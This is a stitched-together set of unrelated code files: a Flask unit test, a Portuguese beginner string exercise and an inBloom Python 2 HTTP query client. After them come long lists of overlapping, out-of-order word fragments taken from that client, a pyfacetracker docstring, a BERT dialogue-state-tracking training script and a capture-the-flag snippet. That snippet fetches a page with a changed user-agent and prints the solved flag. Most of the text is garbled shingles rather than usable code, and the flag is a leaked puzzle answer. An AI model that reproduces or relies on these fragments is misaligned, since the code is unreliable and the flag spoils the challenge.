<filename>unit_tests/LLC1/test_create_llc1.py<gh_stars>1-10
from flask_testing import TestCase
from unit_tests.utilities import Utilities
from maintain_frontend import main
from maintain_frontend.dependencies.session_api.session import Session
from maintain_frontend.constants.permissions import Permissions
from flask import url_for


class TestCreateLLC1(TestCase):
    def create_app(self):
        main.app.testing = True
        Utilities.mock_session_cookie_flask_test(self)
        return main.app

    def test_create_llc1(self):
        self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')
        self.mock_session.return_value.user.permissions = [Permissions.request_llc1]

        response = self.client.get(url_for("create_llc1.create_llc1"))

        self.assert_status(response, 302)
        self.assertRedirects(response, url_for("create_llc1.llc1_get_location"))
        self.mock_session.return_value.commit.assert_called()
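A minimal sketch of how a flask_testing case like this is typically executed, assuming the maintain_frontend project and its unit_tests package are importable; the discovery path is taken from the filename marker above.

# Hypothetical test runner; requires the project on PYTHONPATH.
import unittest

if __name__ == '__main__':
    suite = unittest.defaultTestLoader.discover('unit_tests/LLC1')
    unittest.TextTestRunner(verbosity=2).run(suite)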
<gh_stars>0
# Value of the variable with whitespace stripped from the start and end.
nome = str(input("Seu nome: ")).strip()

# Value of the variable in uppercase letters.
print("Maiúscula:", nome.upper(), "\033[1;32m<--\033[m")

# Value of the variable in lowercase letters.
print("Minúscula:", nome.lower(), "\033[1;32m<--\033[m")

# Counting how many letters the value of the variable nome has, ignoring spaces.
print("Meu nome tem:", len(nome)-nome.count(" "), "\033[1;32m<--\033[m")

# print("Meu primeiro nome tem:", nome.find(" "))
# print("Seu primeiro tem {} letras".format(nome.find(" ")))
separa = nome.split()
print("Meu primeiro nome tem:", len(separa[0]), "\033[1;32m<--\033[m")
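A worked example of the three counting idioms above: len(nome) - nome.count(" ") counts letters excluding spaces, nome.find(" ") gives the index of the first space (which equals the length of the first name), and len(nome.split()[0]) reaches the same number by splitting. The sample name is arbitrary.

# Illustrative only; the sample name is arbitrary.
exemplo = "  Maria Clara  ".strip()       # -> "Maria Clara"
print(len(exemplo) - exemplo.count(" "))  # 10 letters (space excluded)
print(exemplo.find(" "))                  # 5 = length of the first name
print(len(exemplo.split()[0]))            # 5, same result via split()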
<filename>client.py
#!/usr/bin/env python
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib

def parse_cursor(s):
    return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8')))))

class client(object):
    def __init__(self,host='127.0.0.0',port=8000,verbose=False):
        self.headers={}
        self.host=host
        self.port=port
        self.verbose=verbose
        self.errors = []
        self.connect()

    def connect(self):
        try:
            self.conn=httplib2.Http()
        except:
            self.errors.append("Failed to connect to server at host %s port %s." % (self.host,self.port))
            if self.verbose:
                print self.errors[-1]

    #def query(self,httpmode,command,q,opts,parse=True):
    def query(self, *args, **kwargs):
        if not kwargs:
            parse = True
        else:
            parse = kwargs['parse']
        if len(args) == 4:
            httpmode, command, q, opts = args[0:4]
        elif len(args) == 3:
            httpmode, command, q, opts = 'GET', args[0], args[1], args[2]
        uq=urllib.urlencode({"q":json.dumps(q)})
        uopts=urllib.urlencode({"opts":json.dumps(opts)})
        if httpmode == 'GET':
            url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts
            resp,cont=self.conn.request(url,method='GET',headers=self.headers)
        elif httpmode == 'POST':
            url='http://'+self.host+':'+str(self.port)+'/'+command
            resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts)
        else:
            print "BAD HTTP MODE:",httpmode
            return None
        if self.verbose:
            print "REQUEST URL =",url
        if resp.status==200:
            if not parse:
                return cont
            if not opts.has_key("format") or opts["format"] == "json":
                j=json.loads(cont)
                return j
            elif opts.has_key("format"):
                if opts["format"] == "yaml":
                    return yaml.safe_load(cont)
                elif opts["format"] in ["xml","oldxml","johnxml"]:
                    return cont
        else:
            print resp,cont
        return None

    def search_iter(self,q,opts={},pagesize=10):
        opts['format'] = 'json'
        lq = copy.deepcopy(q)
        lq['limit'] = pagesize
        r = self.query('POST','entity/search',lq,opts)
        hits = []
        if r.get('response'):
            hits.extend(r['response'])
        find_dupes(hits)
        while r.get('cursor'):
            #print "ITER CURSOR:",r['cursor'][0:60]
            #print "DECODED CURSOR:",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True)
            lq = {"cursor":r['cursor'],"limit":pagesize}
            r = self.query('POST','entity/search',lq,opts)
            if r.get('response'):
                hits.extend(r['response'])
        print "TOTAL HITS:",len(hits)
        find_dupes(hits)
        return hits

def find_dupes(l):
    h = set()
    for hit in l:
        i = hit['props']['urn:lri:property_type:guid']
        if i in h:
            print "DUPLICATE! ",i
        h.add(i)
    #print "TOTAL SET:",json.dumps(sorted(list(h)),indent=4)

if __name__=='__main__':
    h,p = sys.argv[1].split(":")
    c=client(host=h,port=int(p))
    q = json.loads(sys.argv[2])
    print "QUERY:\n",json.dumps(q,indent=4,sort_keys=True)
    if len(sys.argv) > 3:
        pagesize = int(sys.argv[3])
    else:
        pagesize = 10
    response = c.search_iter(q,pagesize=pagesize)
    print json.dumps(response,indent=4,sort_keys=True)

"""
Usage examples:\n
./client.py GET entity/search '{"urn:lri:property_type:types":"urn:lri:entity_type:type"}' '{"details":true}'
./client.py GET entity/create '{"urn:lri:property_type:id":"MY_FQGUID","urn:lri:property_type:types":["urn:lri:entity_type:thing"]}'
./client.py GET property/create '{"from":"MY_ENTITY_GUID","urn:lri:property_type:name":"THE NAME OF MY ENTITY"}'
./client.py GET property/update '{"guid":"MY_PROPERTY_GUID","value":"MY NEW NAME"}'
"""
\",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p =", "print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url if", "SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if", "= {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return", "= [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server", "return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in", "./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py", "hits def find_dupes(l): h = set() for hit in l: i = hit['props']['urn:lri:property_type:guid']", "\"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True)", "connect to server at host %s port %s.\" % (self.host,self.port)) if self.verbose: print", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "True else: parse = kwargs['parse'] if len(args) == 4: httpmode, command, q, opts", "def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at host %s" ]
[ "import requests url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text)", "requests url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text) #", "url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text) # darkCTF{changeing_http_user_agent_is_easy}" ]
[ "FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written in C++", "Python scripting language. pyfacetracker is available under the BSD License. This has no", "is available free for non-commercial use, and may be redistributed under these conditions.", "\"\"\" pyfacetracker: Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable", "and maintained by <NAME>. It is available free for non-commercial use, and may", "authored by <NAME> and maintained by <NAME>. It is available free for non-commercial", "comfort of the Python scripting language. pyfacetracker is available under the BSD License.", "may be redistributed under these conditions. Please see the LICENSE file for complete", "redistributed under these conditions. Please see the LICENSE file for complete details. **pyfacetracker**", "is a library for deformable face tracking written in C++ using OpenCV 2,", "has no effect on Jason's code, which is available under a separate license.", "around FaceTracker. It enables using FaceTracker while enjoyging the comfort of the Python", "enables using FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker", "scripting language. pyfacetracker is available under the BSD License. This has no effect", "a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort", "the comfort of the Python scripting language. pyfacetracker is available under the BSD", "LICENSE file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It", "FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker is available", "<NAME>. It is available free for non-commercial use, and may be redistributed under", "Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking", "under a separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor::", "and may be redistributed under these conditions. Please see the LICENSE file for", "details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker while", "of the Python scripting language. pyfacetracker is available under the BSD License. This", "use, and may be redistributed under these conditions. Please see the LICENSE file", "conditions. Please see the LICENSE file for complete details. **pyfacetracker** is a thin", "This has no effect on Jason's code, which is available under a separate", "free for non-commercial use, and may be redistributed under these conditions. Please see", "separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>>", "the Python scripting language. pyfacetracker is available under the BSD License. This has", "library for deformable face tracking written in C++ using OpenCV 2, authored by", "a library for deformable face tracking written in C++ using OpenCV 2, authored", "for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using", "while enjoyging the comfort of the Python scripting language. pyfacetracker is available under", "for non-commercial use, and may be redistributed under these conditions. Please see the", "License. This has no effect on Jason's code, which is available under a", "on Jason's code, which is available under a separate license. 
pyfacetracker is copyright", "pyfacetracker is available under the BSD License. This has no effect on Jason's", "license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\"", "copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker import", "deformable face tracking written in C++ using OpenCV 2, authored by <NAME> and", "is a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the", "under these conditions. Please see the LICENSE file for complete details. **pyfacetracker** is", "is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker", "BSD License. This has no effect on Jason's code, which is available under", "a separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME>", "<NAME> and maintained by <NAME>. It is available free for non-commercial use, and", "code, which is available under a separate license. pyfacetracker is copyright (C) 2012", "using FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker is", "face tracking written in C++ using OpenCV 2, authored by <NAME> and maintained", "see the LICENSE file for complete details. **pyfacetracker** is a thin wrapper around", "the LICENSE file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker.", "wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written", "C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>. It is", "available under the BSD License. This has no effect on Jason's code, which", "OpenCV 2, authored by <NAME> and maintained by <NAME>. It is available free", "Jason's code, which is available under a separate license. pyfacetracker is copyright (C)", "available under a separate license. pyfacetracker is copyright (C) 2012 by <NAME> ..", "using OpenCV 2, authored by <NAME> and maintained by <NAME>. It is available", "enjoyging the comfort of the Python scripting language. pyfacetracker is available under the", "written in C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>.", "FaceTracker. It enables using FaceTracker while enjoyging the comfort of the Python scripting", "be redistributed under these conditions. Please see the LICENSE file for complete details.", "for deformable face tracking written in C++ using OpenCV 2, authored by <NAME>", "by <NAME> and maintained by <NAME>. It is available free for non-commercial use,", "FaceTracker is a library for deformable face tracking written in C++ using OpenCV", "in C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>. It", "non-commercial use, and may be redistributed under these conditions. Please see the LICENSE", "wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort of the", "file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables", "under the BSD License. This has no effect on Jason's code, which is", "which is available under a separate license. pyfacetracker is copyright (C) 2012 by", "these conditions. Please see the LICENSE file for complete details. **pyfacetracker** is a", "by <NAME>. It is available free for non-commercial use, and may be redistributed", "no effect on Jason's code, which is available under a separate license. 
pyfacetracker", "It is available free for non-commercial use, and may be redistributed under these", "effect on Jason's code, which is available under a separate license. pyfacetracker is", "(C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker import *", "complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker", "pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from", "language. pyfacetracker is available under the BSD License. This has no effect on", "the BSD License. This has no effect on Jason's code, which is available", "tracking written in C++ using OpenCV 2, authored by <NAME> and maintained by", "**pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging", "thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort of", "is available under a separate license. pyfacetracker is copyright (C) 2012 by <NAME>", "is available under the BSD License. This has no effect on Jason's code,", "available free for non-commercial use, and may be redistributed under these conditions. Please", "It enables using FaceTracker while enjoyging the comfort of the Python scripting language.", "pyfacetracker: Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face", "2, authored by <NAME> and maintained by <NAME>. It is available free for", "Please see the LICENSE file for complete details. **pyfacetracker** is a thin wrapper", "for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written in", "============================================== FaceTracker is a library for deformable face tracking written in C++ using", "maintained by <NAME>. It is available free for non-commercial use, and may be" ]
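Every row in this dump shares one shape: the ngram column holds overlapping 13-token whitespace shingles over a single source file (consecutive shingles share 12 tokens; the stored order appears shuffled). A minimal sketch of producing such a column — the whitespace tokenizer, window width, and stride are inferred from the rows themselves, not documented anywhere in the dump:

```python
def shingles(text: str, n: int = 13) -> list[str]:
    """Emit every n-token window over the whitespace-tokenized text, stride 1."""
    tokens = text.split()
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


# One row of the ngram column per source file, e.g.:
# row = shingles(open("client.py").read())
```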
[ "i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id =", "= prev_label_list + target_label_list # All slot value labels num_labels = [len(labels) for", "@classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file,", "* num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i]", "in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\",", "0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig", "in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup", "enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids", "if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None", "self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id #", "\".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" +", "import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\")", "- 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0]", "in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items())", "dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to", "0: # modify learning rate with special warm up BERT uses lr_this_step =", "dev_loss_slot = [ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot", "'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key,", "key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss':", "output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval", "label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len,", "option is valid only when using label embeddings. 
\\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The", "embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1,", "nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot,", "- 1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f", "\"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys():", "\"This option is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\",", "= len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b):", "predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name')", "Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have", "*****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size)", "torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(", "be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. \\n\" \"Sequences", "n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ##", "in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]", "enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis:", "processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task", "all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader", "accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__", "label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for", "% example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\"", "csv import os import logging import argparse import random import collections import operator", "linear learning rate warmup for. 
\" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\",", "all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation", "sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model", "batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if", "after tokenization. text_a = line[2] + \" # \" + text_a text_b =", "if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu()", "nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss,", "if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology =", "= input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot =", "figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn])", "logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__)", "logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size", "prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx", "Previous task target_label_list = processor.get_labels() # Slot value labels of Present task label_list", "labels of Present task label_list = prev_label_list + target_label_list # All slot value", "str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1:", "if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [ l *", "None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot,", "parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total", "torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features],", "str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev)", "/ nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev 
prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot", "for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file,", "= 0 total_slot_class_acc = [] nlabels = 0 for sid, slot in enumerate(class_count):", "%s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### #", "= \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu >", "/ prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot =", "label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding = [0]", "prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid:", "input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous tasks", "% \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for", "num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] =", "slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt,", "1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for", "eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss,", "nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex):", "in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a,", "a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1:", "torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device =", "not args.do_eval and not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval`", "= [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens", "args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at", "to perform linear learning rate warmup for. 
\" \"E.g., 0.1 = 10%% of", "= all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer,", "optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if", "1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\"", "accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc", "padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1,", "tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy,", "nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy", "\"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for", "key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ###############################################################################", "in place to the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b)", "= SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the", "loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is", "last_update + args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file", "processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids,", "+ len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else:", "and last_update + args.patience <= epoch: if last_update + args.patience <= epoch: break", "ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else:", "# Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot", "special warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion)", 
